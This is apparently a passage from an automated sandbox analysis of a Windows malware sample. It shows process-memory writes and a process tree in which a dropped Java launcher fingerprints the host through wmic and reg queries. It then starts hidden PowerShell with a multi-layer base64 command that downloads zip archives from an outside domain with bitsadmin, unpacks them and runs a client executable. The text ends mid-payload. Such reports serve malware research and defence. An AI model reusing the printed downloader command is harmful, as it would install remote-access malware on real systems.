PID 3376 wrote to memory of 4216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3376 wrote to memory of 4216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3376 wrote to memory of 1632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3376 wrote to memory of 1632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3376 wrote to memory of 1632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3376 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3376 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3376 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3616 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3616 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3616 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1532 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1532 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1532 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1532 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1532 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1532 wrote to memory of 2808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1532 wrote to memory of 2808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1532 wrote to memory of 2808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3616 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3616 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3616 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1452 wrote to memory of 4996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1452 wrote to memory of 4996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1452 wrote to memory of 4996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1452 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1452 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1452 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1452 wrote to memory of 3744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1452 wrote to memory of 3744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1452 wrote to memory of 3744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3616 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3616 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3616 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 4900 wrote to memory of 3508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4900 wrote to memory of 3508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4900 wrote to memory of 3508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4900 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 4900 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3616 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3616 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3616 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3616 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3616 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3616 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe

"C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe"

C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93RXJTSGVMTCAtbm9wUm8gLUV4ZWNVVElvTnBPIEJZcGFTUyAtdyBISWQgLWVjIEpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQVBRQW5BR2dBZEFCMEFIQUFjd0E2QUM4QUx3Qm5BR0VBYVFCc0FITUFZUUJqQUdFQVpBQmxBRzBBZVFBdUFHTUFid0J0QUM4QVpnQjZBR0VBTHdCbUFERUFZUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBOUFFY0FZd0JOQUNBQVpRQjRBSEFBUVFCT0FHUUFMUUJCQUhJQVF3QklBRWtBVmdCbEFDQUFMUUJGQUhJQWNnQlBBSElBUVFCakFGUUFhUUJQQUc0QUlBQnpBRWtBVEFCbEFFNEFWQUJzQUZrQVF3QlBBRzRBVkFCSkFFNEFWUUJsQURzQUlBQWtBSFVBYXdCWUFGZ0FVZ0JHQUVrQVpRQTlBQ2NBYlFBekFESUFWd0JXQURVQVlnQlNBQzRBZWdCcEFIQUFKd0E3QUNBQUpBQlNBSElBVGdCb0FFZ0FTUUJsQUQwQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QVp3QmhBR2tBYkFCekFHRUFZd0JoQUdRQVpRQnRBSGtBTGdCakFHOEFiUUF2QUdZQWVnQmhBQzhBWmdBMEFHRUFMZ0I2QUdrQWNBQW5BRHNBSUFBa0FITUFWUUJDQUhBQVlnQm1BRGdBUFFBbkFFd0FUd0F4QUdrQWJnQk9BRUVBTGdCNkFHa0FjQUFuQURzQUlBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQVBRQkhBR01BVFFBZ0FGTUFWQUJoQUhJQVZBQXRBR0lBYVFCVUFITUFkQUJTQUdFQWJnQnpBR1lBWlFCeUFDQUFMUUJsQUhJQWNnQlBBRklBWVFCakFGUUFTUUJ2QUU0QUlBQlRBR2tBYkFCbEFFNEFWQUJNQUhrQVl3QnZBRTRBVkFCSkFHNEFkUUJGQURzQUlBQWtBR0lBYkFCaUFHVUFjQUI2QUZvQVBRQW5BRFlBUkFCTkFFd0FWUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFVZ0JuQUhvQU5RQlhBRXdBYmdBOUFDY0FhQUIwQUhRQWNBQnpBRG9BTHdBdkFHY0FZUUJwQUd3QWN3QmhBR01BWVFCa0FHVUFiUUI1QUM0QVl3QnZBRzBBTHdCbUFIb0FZUUF2QUdZQU13QmhBQzRBZWdCcEFIQUFKd0E3QUNBQVd3QnVBR1VBZEFBdUFITUFSUUJ5QUhZQWFRQkRBRVVBVUFCUEFFa0FUZ0IwQUcwQVFRQk9BRUVBUndCRkFGSUFYUUE2QURvQWN3QmxBRU1BZFFCU0FFa0FWQUJaQUhBQVVnQlBBRlFBYndCakFFOEFiQUFnQUQwQUlBQmJBRTRBWlFCMEFDNEFjd0JGQUdNQVZRQlNBRWtBVkFCWkFGQUFVZ0JQQUhRQVR3QmpBRThBVEFCMEFGa0FjQUJsQUYwQU9nQTZBRlFBVEFCVEFERUFNZ0E3QUNBQUpBQkpBRzRBUXdCSEFESUFNZ0JXQUVvQVBRQW5BRlFBWlFCdEFIQUFRd0J2QUc0QWRBQnlBRzhBYkFCc0FDY0FPd0FnQUNRQU5BQjVBRVlBWXdCS0FGWUFTZ0E5QUNjQWJBQTRBR1VBUmdCV0FFOEFVd0JUQUM0QWVnQnBBSEFBSndBN0FDQUFZd0JFQUNBQUpBQkZBRzRBZGdBNkFFRUFjQUJ3QUdRQVlRQjBBR0VBT3dBZ0FDUUFSQUF6QUdjQWJBQndBRDBBSndCb0FIUUFkQUJ3QUhNQU9nQXZBQzhBWndCaEFHa0FiQUJ6QUdFQVl3QmhBR1FBWlFCdEFIa0FMZ0JqQUc4QWJRQXZBR1lBZWdCaEFDOEFaZ0F5QUdFQUxnQjZBR2tBY0FBbkFEc0FJQUFrQUVZQVl3QnRBRllBVndCekFGa0FQUUFpQUNRQVpRQk9BSFlBT2dCaEFGQUFVQUJrQUVFQWRBQkJBRndBSkFCaUFHd0FZZ0JsQUhBQWVnQmFBQ0lBT3dBZ0FDUUFlQUJJQUdZQU5RQjRBRzhBVFFCMUFEMEFJZ0FrQUdVQVRnQjJBRG9BUVFCd0FIQUFSQUJoQUhRQVFRQmNBQ1FBY3dCVkFFSUFjQUJpQUdZQU9BQWlBRHNBSUFBa0FFNEFjd0JLQUhnQWRRQlpBRGdBVkFBOUFDSUFld0F3QUgwQVhBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQmxBRzRBVmdBNkFFRUFVQUJ3QUVRQVFRQjBBRUVBTEFBZ0FDUUFkUUJyQUZnQVdBQlNBRVlBU1FCbEFEc0FJQUFrQUdRQU1BQkVBRGNBV1FCd0FEMEFTZ0J2QUVrQVRnQXRBRkFBUVFCVUFHZ0FJQUF0QUhBQVFRQjBBRWdBSUFBa0FHVUFiZ0JXQURvQVFRQlFBSEFBUkFCQkFIUUFRUUFnQUMwQVl3QklBR2tBVEFCa0FGQUFRUUIwQUdnQUlBQWtBRFFBZVFCR0FHTUFTZ0JXQUVvQU93QWdBQ1FBU3dCT0FEWUFUUUJNQUhJQWJBQnFBRDBBSWdCaUFHa0FkQUJ6QUdFQVpBQk5BRWtBVGdBdUFHVUFXQUJsQUNBQUx3QlVBRklBUVFCT0FGTUFaZ0JsQUZJQUlBQjBBR0lBWlFCT0FHc0FJQUF2QUVRQVR3QlhBRzRBVEFCUEFFRUFSQUFnQUM4QVVBQnlBR2tBYndCU0FFa0FWQUJaQUNBQWJnQnZBSElBYlFCQkFFd0FJQUI3QURBQWZRQWdBSHNBTVFCOUFDSUFJQUF0QUdZQUlBQWtBRklBWndCNkFEVUFWd0JNQUc0QUxBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFBa0FIUUFRUUExQURBQVJRQTlBQ2NBUWdCSkFGUUFVd0JCQUdRQWJRQkpBRTRBTGdCRkFIZ0FSUUFnQUM4QVZBQlNBR0VBVGdCVEFHWUFSUUJ5QUNBQU1BQjJBR0VBYUFCc0FDQUFMd0JFQUU4QWR3QnVBRXdBVHdCQkFHUUFJQUF2QUhBQWNnQnBBRThBVWdCcEFGUUFlUUFnQUU0QVR3QnlBRTBBWVFCc0FDQUFKd0FyQUNRQVJBQXpBR2NBYkFCd0FDc0FKd0FnQUNjQUt3QWtBRVlBWXdCdEFGWUFWd0J6QUZrQU93QWdBQ1FBTWdCeEFHWUFhQUJKQUc4QVpRQTlBQ0lBSkFCRkFHNEFkZ0E2QUdFQWNBQndBRVFBUVFCVUFFRUFYQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FpQURzQUlBQWtBR1FBZFFCdUFGUUFOd0JCQUZVQVBRQWlBR0lBYVFCMEFGTUFZUUJrQUcwQVNRQnVBQzRBWlFCWUFHVUFJQUF2QUhRQVVnQkJBRTRBVXdCbUFHVUFVZ0FnQUZjQVJBQmFBSE1BVHdCbkFDQUFMd0JrQUc4QWR3Qk9BRXdBYndCQkFFUUFJQUF2QUhBQVVnQnBBRzhBY2dCcEFGUUFlUUFnQUU0QWJ3QlNBRTBBUVFCc0FDQUFld0F3QUgwQUlBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQUxBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBQ1FBVndCTkFHVUFiQUJvQUZvQVN3QTlBQ0lBWWdCcEFIUUFVd0JoQUdRQWJRQkpBRzRBTGdCbEFGZ0FaUUFnQUM4QWRBQlNBRUVBVGdCVEFHWUFaUUJTQUNBQVZ3QkVBRm9BY3dCUEFHY0FJQUF2QUdRQWJ3QjNBRTRBVEFCdkFFRUFSQUFnQUM4QWNBQlNBR2tBYndCeUFHa0FWQUI1QUNBQVRnQnZBRklBVFFCQkFHd0FJQUFrQUZJQWNnQk9BR2dBU0FCSkFHVUFJQUFrQUU0QWN3QktBSGdBZFFCWkFEZ0FWQUFpQURzQUlBQkpBRVlBSUFBb0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBcEFDQUFld0FnQUdrQVJnQWdBQ2dBSkFCdUFFVUFOQUJCQUU0QVRBQm1BQ2tBSUFCN0FDQUFjd0IwQUVFQVVnQlVBQzBBWWdCcEFGUUFVd0IwQUhJQVFRQk9BRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBRklBUXdCRkFDQUFKQUJFQURNQVp3QnNBSEFBSUFBdEFFUUFaUUJUQUZRQWFRQk9BRUVBVkFCcEFFOEFUZ0FnQUNRQVJnQmpBRzBBVmdCWEFITUFXUUE3QUNBQWN3QjBBRUVBY2dCVUFDMEFZZ0JwQUZRQWN3QjBBRklBUVFCT0FGTUFSZ0JGQUhJQUlBQXRBSE1BVHdCVkFISUFRd0JsQUNBQUpBQlNBR2NBZWdBMUFGY0FUQUJ1QUNBQUxRQmtBRVVBY3dCVUFFa0FUZ0JCQUZRQWFRQlBBRzRBSUFBa0FIZ0FTQUJtQURVQWVBQnZBRTBBZFFBN0FDQUFVd0JVQUVFQVVnQjBBQzBBUWdCSkFIUUFjd0IwQUhJQVlRQnVBRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBSElBUXdCbEFDQUFKQUJTQUhJQVRnQm9BRWdBU1FCbEFDQUFMUUJFQUdVQWN3QlVBR2tBVGdCaEFGUUFhUUJQQUU0QUlBQWtBRTRBY3dCS0FIZ0FkUUJaQURnQVZBQTdBQ0FBVXdCVUFFRUFjZ0JVQUMwQVFnQkpBRlFBVXdCVUFISUFZUUJPQUhNQVJnQkZBSElBSUFBdEFITUFid0JWQUZJQVl3QkZBQ0FBSkFCcEFHVUFVUUJ5QUdRQU9RQmtBRU1BSUFBdEFHUUFaUUJ6QUZRQWFRQk9BRUVBZEFCSkFHOEFiZ0FnQUNRQVpBQXdBRVFBTndCWkFIQUFPd0FnQUgwQUlBQkZBR3dBVXdCbEFDQUFld0JwQUc0QWRnQnZBRXNBWlFBdEFHVUFXQUJ3QUZJQVpRQnpBRk1BU1FCUEFFNEFJQUF0QUVNQWJ3Qk5BRzBBUVFCdUFHUUFJQUFrQUVzQVRnQTJBRTBBVEFCeUFHd0FhZ0E3QUNBQVNRQk9BRllBYndCTEFFVUFMUUJsQUZnQVVBQnlBR1VBY3dCVEFFa0Fid0J1QUNBQUxRQkRBRThBVFFCTkFFRUFUZ0JrQUNBQUpBQjBBRUVBTlFBd0FFVUFPd0FnQUVrQVJRQllBQ0FBTFFCREFFOEFUUUJ0QUVFQWJnQmtBQ0FBSkFCWEFFMEFaUUJzQUdnQVdnQkxBRHNBSUFCSkFHNEFWZ0J2QUVzQVJRQXRBR1VBV0FCUUFGSUFSUUJ6QUZNQVNRQlBBRzRBSUFBdEFFTUFid0J0QUUwQVFRQk9BR1FBSUFBa0FHUUFkUUJ1QUZRQU53QkJBRlVBT3dBZ0FIMEFJQUJsQUZnQWNBQmhBRTRBWkFBdEFHRUFVZ0JEQUVnQVNRQldBRVVBSUFBdEFGQUFZUUIwQUdnQUlBQWtBSGdBU0FCbUFEVUFlQUJ2QUUwQWRRQWdBQzBBWkFCbEFITUFkQUJKQUc0QVlRQlVBRWtBYndCdUFIQUFRUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBR1VBZUFCUUFHRUFUZ0JrQUMwQVFRQlNBR01BU0FCcEFIWUFSUUFnQUMwQWNBQmhBSFFBU0FBZ0FDUUFUZ0J6QUVvQWVBQjFBRmtBT0FCVUFDQUFMUUJrQUVVQWN3QlVBR2tBVGdCQkFGUUFhUUJQQUc0QWNBQmhBSFFBYUFBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBN0FDQUFSUUI0QUhBQVFRQnVBRVFBTFFCaEFISUFZd0JvQUdrQWRnQkZBQ0FBTFFCUUFHRUFWQUJvQUNBQUpBQkdBR01BYlFCV0FGY0Fjd0JaQUNBQUxRQmtBRVVBY3dCMEFHa0FUZ0JCQUhRQVNRQnZBRzRBVUFCaEFIUUFhQUFnQUNRQU1nQnhBR1lBYUFCSkFHOEFaUUE3QUNBQVJRQjRBRkFBWVFCdUFHUUFMUUJoQUhJQVF3QklBR2tBZGdCRkFDQUFMUUJRQUdFQWRBQklBQ0FBSkFCa0FEQUFSQUEzQUZrQWNBQWdBQzBBUkFCbEFGTUFkQUJwQUc0QVFRQjBBRWtBVHdCdUFGQUFZUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBSElBUlFCTkFFOEFWZ0JsQUMwQVNRQjBBRVVBYlFBZ0FDMEFjQUJoQUhRQWFBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBR1VBVWdCQkFITUFSUUFnQUMwQVVBQmhBSFFBYUFBZ0FDUUFSZ0JqQUcwQVZnQlhBSE1BV1FBN0FDQUFaUUJTQUVFQWN3QkZBQ0FBTFFCd0FHRUFkQUJvQUNBQUpBQk9BSE1BU2dCNEFIVUFXUUE0QUZRQU93QWdBRklBUkFBZ0FDMEFVQUJoQUhRQVNBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFCOUFDQUFaUUJzQUZNQVJRQWdBSHNBSUFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BUFFBbkFHZ0FkQUIwQUhBQWN3QTZBQzhBTHdCbkFHRUFhUUJzQUhNQVlRQmpBR0VBWkFCbEFHMEFlUUF1QUdNQWJ3QnRBQzhBWmdCNkFHWUFMd0FuQURzQUlBQnVBRWtBSUFBdEFIQUFZUUIwQUVnQUlBQWtBR1VBYmdCV0FEb0FZUUJRQUZBQVJBQkJBRlFBWVFBZ0FDMEFiZ0JoQUUwQVJRQWdBQ1FBU1FCdUFFTUFSd0F5QURJQVZnQktBQ0FBTFFCcEFIUUFSUUJOQUZRQWVRQlFBRVVBSUFBbkFHUUFhUUJ5QUdVQVl3QjBBRzhBY2dCNUFDY0FPd0FnQUNRQVV3QllBRmdBZEFBMEFEMEFRQUFvQUNjQVFRQjFBR1FBYVFCdkFFTUFZUUJ3QUhRQWRRQnlBR1VBTGdCa0FHd0FiQUFuQUN3QUlBQW5BR01BYkFCcEFHVUFiZ0IwQURNQU1nQXVBR2tBYmdCcEFDY0FMQUFnQUNjQVRnQlRBRTBBTGdCTUFFa0FRd0FuQUN3QUlBQW5BRkFBUXdCSkFFTUFUQUF6QURJQUxnQkVBRXdBVEFBbkFDd0FJQUFuQUZRQVF3QkRBRlFBVEFBekFESUFMZ0JFQUV3QVRBQW5BQ3dBSUFBbkFHNEFjd0J0QUY4QWRnQndBSElBYndBdUFHa0FiZ0JwQUNjQUxBQWdBQ2NBWXdCc0FHa0FaUUJ1QUhRQU13QXlBQzRBWlFCNEFHVUFKd0FzQUNBQUp3QklBRlFBUXdCVUFFd0FNd0F5QUM0QVJBQk1BRXdBSndBc0FDQUFKd0J1QUhNQWF3QmlBR1lBYkFCMEFISUFMZ0JwQUc0QVpnQW5BQ3dBSUFBbkFHMEFjd0IyQUdNQWNnQXhBREFBTUFBdUFHUUFiQUJzQUNjQUxBQWdBQ2NBVUFCREFFa0FRd0JJQUVVQVN3QXVBRVFBVEFCTUFDY0FMQUFnQUNjQWNBQmpBR2tBWXdCaEFIQUFhUUF1QUdRQWJBQnNBQ2NBTEFBZ0FDY0FjZ0JsQUcwQVl3QnRBR1FBY3dCMEFIVUFZZ0F1QUdVQWVBQmxBQ2NBS1FBN0FDQUFhUUJHQUNBQUtBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQUtRQWdBSHNBSUFBa0FGTUFXQUJZQUhRQU5BQWdBSHdBSUFCbUFHOEFVZ0JsQUVFQVl3Qm9BQzBBVHdCaUFHb0FaUUJqQUhRQUlBQjdBQ0FBSkFBeEFFd0FWZ0JUQUVvQWF3QlZBRDBBSkFCb0FHa0FhQUJVQUZnQVV3QktBQ3NBSkFCZkFEc0FJQUFrQUVrQWF3Qk9BRW9BY2dCT0FGY0FQUUJLQUc4QWFRQnVBQzBBY0FCQkFIUUFTQUFnQUMwQVVBQkJBSFFBU0FBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBZ0FDMEFRd0JvQUdrQVRBQmtBRkFBUVFCVUFHZ0FJQUFrQUY4QU93QWdBRk1BZEFCaEFISUFkQUF0QUVJQWFRQjBBRk1BVkFCeUFFRUFiZ0J6QUVZQVJRQlNBQ0FBTFFCekFHOEFkUUJ5QUVNQVpRQWdBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQWdBQzBBUkFCRkFGTUFWQUJKQUU0QVlRQjBBRWtBVHdCdUFDQUFKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUI5QURzQWZRQWdBR1VBVEFCVEFFVUFJQUI3QUNBQUpBQlRBRmdBV0FCMEFEUUFJQUI4QUNBQUpRQWdBSHNBSUFBa0FERUFUQUJXQUZNQVNnQnJBRlVBUFFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BS3dBa0FGOEFPd0FnQUNRQVNRQnJBRTRBU2dCeUFFNEFWd0E5QUNJQUpBQXlBSEVBWmdCb0FFa0Fid0JsQUZ3QUpBQmZBQ0lBT3dBZ0FDUUFSUUJTQUVJQU13QkRBRkVBTWdBOUFDY0FRZ0JKQUhRQVV3QkJBRVFBVFFCcEFHNEFMZ0JGQUZnQVJRQWdBQzhBVkFCeUFFRUFUZ0JUQUdZQVJRQlNBQ0FBY1FCV0FIUUFkZ0JQQUNBQUx3QmtBRThBVndCdUFHd0Fid0JCQUVRQUlBQXZBRkFBY2dCcEFFOEFjZ0JKQUhRQVdRQWdBRzRBVHdCeUFFMEFZUUJzQUNBQUp3QXJBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQXJBQ2NBSUFBbkFDc0FKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUJKQUU0QVZnQnZBRXNBUlFBdEFHVUFXQUJRQUhJQVpRQnpBRk1BU1FCdkFHNEFJQUF0QUVNQVR3Qk5BRTBBUVFCT0FHUUFJQUFrQUVVQVVnQkNBRE1BUXdCUkFESUFPd0I5QURzQUlBQjlBRHNBSUFCOUFEc0FJQUFrQURjQVpnQTFBRzBBZWdCekFGY0FQUUJuQUdVQWRBQXRBR2tBZEFCbEFHMEFJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVZQWJ3QnlBR01BUlFBN0FDQUFKQUEzQUdZQU5RQnRBSG9BY3dCWEFDNEFZUUJVQUZRQVVnQkpBRUlBVlFCVUFHVUFVd0E5QUNjQVNBQnBBR1FBWkFCbEFHNEFKd0E3QUNBQUpBQmhBRUVBVHdCNkFISUFRUUJVQUQwQVNnQnZBR2tBVGdBdEFGQUFRUUIwQUdnQUlBQXRBSEFBWVFCVUFFZ0FJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVNQVNBQkpBR3dBUkFCUUFFRUFWQUJvQUNBQUp3QmpBR3dBYVFCbEFHNEFkQUF6QURJQUxnQmxBSGdBWlFBbkFEc0FJQUJqQUdnQVJBQkpBRklBSUFBa0FESUFjUUJtQUdnQVNRQnZBR1VBT3dBZ0FFNEFaUUJYQUMwQVNRQlVBR1VBVFFCUUFGSUFUd0JRQUdVQVVnQjBBSGtBSUFBdEFGQUFZUUJVQUdnQUlBQW5BRWdBU3dCREFGVUFPZ0JjQUZNQVR3QkdBRlFBVndCQkFGSUFSUUJjQUUwQWFRQmpBSElBYndCekFHOEFaZ0IwQUZ